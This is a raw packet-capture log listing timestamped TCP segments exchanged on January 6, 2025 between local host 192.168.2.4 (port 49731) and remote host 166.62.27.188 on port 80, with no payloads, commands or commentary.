Jan 6, 2025 07:57:58.846968889 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846978903 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846992970 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847002983 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847004890 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847026110 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847044945 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847073078 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847084999 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847095013 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847115040 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847115040 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847129107 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847134113 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847141027 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847158909 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847177982 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847178936 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847193003 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847204924 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847204924 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847244024 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847250938 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847256899 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847268105 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847286940 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847322941 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847328901 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847340107 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847351074 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847364902 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847374916 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847378016 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847418070 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847470045 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847480059 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847496986 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847513914 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847515106 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847527027 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847536087 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847543001 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847553015 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847567081 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847578049 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847589016 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847590923 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847604036 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847615004 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847621918 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847652912 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847654104 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847666025 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847706079 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847875118 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847887039 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847898960 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847935915 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.847960949 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847978115 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847996950 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.847999096 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848009109 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848027945 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848036051 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848038912 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848057985 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848064899 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848069906 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848083973 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848092079 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848110914 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848120928 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848128080 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848140955 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848150969 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848160028 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848162889 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848190069 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848191023 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848203897 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848213911 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848229885 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848232031 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848243952 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848253965 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848257065 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848274946 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848284960 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848284960 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848298073 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848315001 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848321915 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848335028 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848345995 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848351955 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848357916 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848367929 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848370075 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848495007 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848520994 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848570108 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848579884 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848598957 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848612070 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848617077 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848623991 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848624945 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848638058 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848649025 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848673105 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848711014 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848721981 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848731995 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848748922 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848753929 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848764896 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848786116 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848797083 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848800898 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848815918 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848825932 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848834038 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848836899 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848853111 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848859072 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848869085 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848872900 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848891020 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848901987 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.848910093 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.848942995 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.930232048 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.932701111 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.932725906 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.932749033 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.932760954 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.932770014 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.932775021 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.932787895 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.932797909 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.932806969 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.932827950 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.932831049 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.932842016 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.932852030 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.932864904 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.932872057 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.932884932 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.932905912 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.932909012 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.932919025 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.932925940 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.932939053 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.932952881 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.932952881 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.932964087 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.932975054 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.932988882 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.932998896 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933015108 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933026075 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933028936 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933037996 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933053970 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933056116 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933079004 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933118105 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933130026 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933141947 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933156967 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933176994 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933177948 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933188915 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933207035 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933223009 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933224916 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933243036 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933254004 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933264971 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933268070 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933278084 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933283091 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933293104 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933314085 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933320045 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933331966 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933342934 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933357000 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933360100 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933377028 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933377028 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933393002 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933412075 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933422089 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933423042 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933443069 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933449030 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933455944 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933468103 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933476925 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933518887 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933556080 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933566093 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933590889 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933595896 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933609962 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933619976 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933629990 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933643103 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933651924 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933659077 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933670998 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933680058 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933681965 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933697939 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933701992 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933713913 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933725119 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933727026 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933736086 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933753967 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933770895 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933792114 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933803082 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933813095 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933824062 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933830976 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933844090 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933855057 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933868885 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933868885 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933878899 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933892012 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933897972 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933902979 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933926105 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933938026 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933943033 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.933950901 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933962107 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933970928 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.933978081 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934005022 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934119940 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934129953 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934139967 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934160948 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934163094 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934174061 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934182882 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934195995 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934206963 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934214115 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934226036 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934232950 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934240103 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934250116 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934279919 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934562922 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934572935 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934590101 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934602976 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934604883 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934616089 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934636116 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934644938 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934648991 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934669018 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934676886 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934686899 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934699059 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934705019 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934710026 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934731007 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934739113 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934741974 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934761047 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934770107 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934772968 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934789896 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934797049 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934802055 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934815884 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934823990 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934828997 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934840918 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934850931 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934853077 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934866905 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934878111 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934892893 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934897900 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934907913 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934917927 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934925079 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934937000 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934938908 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934951067 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934962988 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.934963942 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.934987068 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.935007095 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.935018063 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.935030937 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.935040951 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.935040951 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.935065031 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.935137987 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.935148001 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.935164928 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.935173988 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.935179949 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.935192108 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.935199022 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.935211897 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.935221910 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.935233116 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.935235023 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.935259104 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.935265064 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.935271978 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.935290098 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.935306072 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.935323000 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.935336113 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.935342073 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.935349941 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.935360909 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.935370922 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.935398102 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.064656973 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064675093 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064697027 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064718008 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064718962 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.064734936 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064748049 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064759970 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064762115 CET	49731	80	192.168.2.4	166.62.27.188
